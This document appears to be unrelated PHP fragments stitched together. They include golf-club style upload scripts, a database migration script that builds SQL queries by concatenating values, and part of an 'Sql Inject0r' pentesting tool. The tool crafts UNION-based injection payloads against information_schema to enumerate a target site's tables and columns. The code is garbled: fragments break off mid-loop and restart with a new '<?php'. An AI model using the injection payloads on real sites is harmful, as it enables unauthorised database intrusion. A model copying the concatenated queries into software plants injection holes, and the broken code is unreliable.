require_once realpath($_SERVER["DOCUMENT_ROOT"]) . '/login.php';
require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $script_folder . '/functions.php';
require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $wp_folder . '/wp-blog-header.php';
date_default_timezone_set('America/Los_Angeles');
$connection = new mysqli($db_hostname, $db_username, $db_password, $db_database);
if ($connection->connect_error) {
die($connection->connect_error);
}
// var_dump($_POST);
login($_POST['Login'], $_POST['Password']);
if (!isset($_POST['LocalHandicap'])) {
die("No list of local handicaps");
} else {
if (isset($_POST['ClearTable'])) {
clear_table($connection, 'LocalHandicap');
}
if (isset($_POST['LocalHandicapDate'])) {
$sqlCmd = "UPDATE `Misc` SET `LocalHandicapDate` = ?";
$update = $connection->prepare($sqlCmd);
if (!$update) {
die($sqlCmd . " prepare failed: " . $connection->error);
}
if (!$update->bind_param('s', $_POST['LocalHandicapDate'])) {
die($sqlCmd . " bind_param failed: " . $connection->error);
}
if (!$update->execute()) {
die($sqlCmd . " execute failed: " . $connection->error);
}
}
for ($i = 0; $i < count($_POST['LocalHandicap']); ++$i) {
<?php
require_once realpath($_SERVER["DOCUMENT_ROOT"]) . '/login.php';
require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $script_folder . '/functions.php';
require_once realpath($_SERVER["DOCUMENT_ROOT"]) . $wp_folder . '/wp-blog-header.php';
date_default_timezone_set('America/Los_Angeles');
$connection = new mysqli($db_hostname, $db_username, $db_password, $db_database);
if ($connection->connect_error) {
die($connection->connect_error);
}
//var_dump($_POST);
login($_POST['Login'], $_POST['Password']);
if (!isset($_POST['WaitingList'])) {
die("No waiting list provided.");
} else {
clear_table($connection, 'WaitingList');
for ($i = 0; $i < count($_POST['WaitingList']); ++$i) {
$sqlCmd = "INSERT INTO `WaitingList` VALUES (?, ?, ?)";
$insert = $connection->prepare($sqlCmd);
if (!$insert) {
die($sqlCmd . " prepare failed: " . $connection->error);
}
// Change upper case name to normal case
$name = FixNameCasing($_POST['WaitingList'][$i]['Name']);
if (!$insert->bind_param('iss', $_POST['WaitingList'][$i]['Position'], $name, $_POST['WaitingList'][$i]['DateAdded'])) {
die($sqlCmd . " bind_param failed: " . $connection->error);
}
if (!$insert->execute()) {
die($sqlCmd . " execute failed: " . $connection->error);
}
}
log_event('Accessing database ‘' . $dbname . '’ …', true);
mysql_select_db($dbname) or die('Failed to select database: ' . mysql_error());
if ($clear_chirpy_tables) {
log_event('Clearing Chirpy!’s tables …');
$tables = array();
$tables[] = 'accounts';
$tables[] = 'events';
$tables[] = 'event_metadata';
$tables[] = 'news';
$tables[] = 'quotes';
$tables[] = 'quote_tag';
$tables[] = 'sessions';
$tables[] = 'tags';
$tables[] = 'vars';
foreach ($tables as $table) {
clear_table($chirpy_table_prefix . $table);
}
log_event('Tables cleared', true);
}
log_event('Importing user information …');
$users_result = mysql_query('SELECT * FROM `' . $rashusers . '`') or die('Error retrieving user information: ' . mysql_error());
$count_users = 0;
while ($row = mysql_fetch_array($users_result)) {
$count_users++;
mysql_query('INSERT INTO `' . $chirpy_table_prefix . 'accounts`' . ' (`username`, `password`, `level`)' . ' VALUES ("' . $row['user'] . '", "' . $row['password'] . '", ' . convert_level($row['level']) . ')') or die('Error importing user information: ' . mysql_error());
}
log_event('Users imported: ' . $count_users, true);
mysqL_free_result($users_result);
log_event('Importing news items …');
$news_result = mysql_query('SELECT * FROM `' . $newstable . '`') or die('Error retrieving news: ' . mysql_error());
$count_news = 0;
$hex = '';
for ($i = 0; $i < strlen($string); $i++) {
$hex .= dechex(ord($string[$i]));
}
print "<html> <head><title> [S]ql Inject0r - Website Pentesting Tool </head></head><body bgcolor='black'>";
print "<center><a href='javascript:back();' STYLE='text-decoration:none'>[ <font color='#7A7AF7'>Back</font> ]</a>";
$print_table = preg_replace("/{$visible_col}/", "concat(0x73616e64656570,0x3a,TAbLe_NamE,0x3a,ColUmn_NamE,0x3a,0x73616e6465657031)+from+information_schema.columns+where+table_schema=0x{$hex}--+-", $disp_table);
// get table namnes
$split_table_column = preg_replace("/{$visible_col}/", "concat(0x7461626c65,0x3b,TAbLe_NamE,0x3b,0x7461626c6531,0x20,0x636f6c756d6e,0x3a,ColUmn_NamE,0x3a,0x636f6c756d6e31)+from+information_schema.columns+where+table_schema=0x{$hex}--+-", $disp_table);
// eXTRACTING Table And column
$html_table_col = file_get_contents($print_table);
$split_table_column_html = file_get_contents($split_table_column);
//Executing COlumn
$splited_html_table_col = file_get_contents($split_table_column);
//Executing Table
$get_table_col = clear_table($html_table_col);
// Get all Table name
$splited_column = splited_column($splited_html_table_col);
// Get COlun names
$splited_table = split_table($split_table_column_html);
// Get Table Names
print "<br><br>";
print "<div>";
print "<center><table id='logintable' cellpadding='0' cellspaceing='2' border='0' >";
for ($c = 0; $c <= sizeof($get_table_col); $c++) {
print "<tr><td><a style='text-decoration: none;' href='dosql.php?db={$db}&options={$option}&col={$visible_col}&table={$splited_table[$c]}&column={$splited_column[$c]}&link2={$disp_table}'><center>" . $get_table_col[$c] . "</a></td</tr></center>";
}
print "</table>";
$c = $c - 1;
print "<font color='white'>Total Column count Is " . $c . "</font>";
}
